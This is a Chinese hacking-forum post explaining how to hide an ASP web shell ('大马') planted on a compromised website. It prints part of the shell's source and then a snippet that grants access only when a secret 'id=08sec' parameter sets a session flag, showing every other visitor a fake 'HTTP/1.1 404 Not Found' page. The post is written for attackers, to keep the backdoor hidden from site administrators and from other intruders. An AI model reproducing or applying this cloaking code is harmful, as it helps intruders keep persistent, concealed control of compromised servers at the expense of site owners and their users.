设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1804|回复: 0

另类隐藏保护asp大马地址方法

[复制链接]

 成长值: 50620

发表于 2014-7-3 02:06 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
另类隐藏保护asp大马地址方法
我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了
或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。
2014070313311900.jpg
如何加上密码让他人进不来呢?
有些人直接加个登陆界面,人家一看就知道这是大马,还可以猜密码,我的方法就与众不同
首先我们来看看他的一部分源码
<%
'pue=true
On Error Resume Next
server.scripttimeout=600
UserPass="login"
response.buffer = true
Response.Expires = -1
Session.Timeout=60
Const wwj="NET WORK SYSTEM"
Const jlt="WEB TESTER'S SYSTEM"
Const oqk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf"
Const pnf=true
Const rfd=33
Const yqo="dsmfk"
Const kuf="GB2312"
Const gco="_"
Const fgb="want_pre.asp"
Const righthz="_request_send_sumbit_include_reel_open_form_month_data"
public br,pbwell,juppath,foldermax,maxpath
foldermax=0
dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz
jki= Clng("&H0")
for i=0 to 12
cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&","
jki=jki+1118481
next
colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000"
cl=split(colors,",")
怎样进行处理呢?
我在前面加上了

<%
if request("id")="08sec" then
session("ISUSER00")= "TRUE"
end if
%>
<%
If Session("ISUSER00") = "" Then
response.write("
HTTP/1.1 404 Not Found")
Response.End
end if
%>
这段代码的意思是
如果返回的id是08sec的话就添加一个session isuser00的值为true
如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found
如果不是就执行下面的代码
所以我们的大马就被保护起来了
效果如下:
2014070313312201.jpg
2014070313312602.jpg




来源:网络转载
随遇而安
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表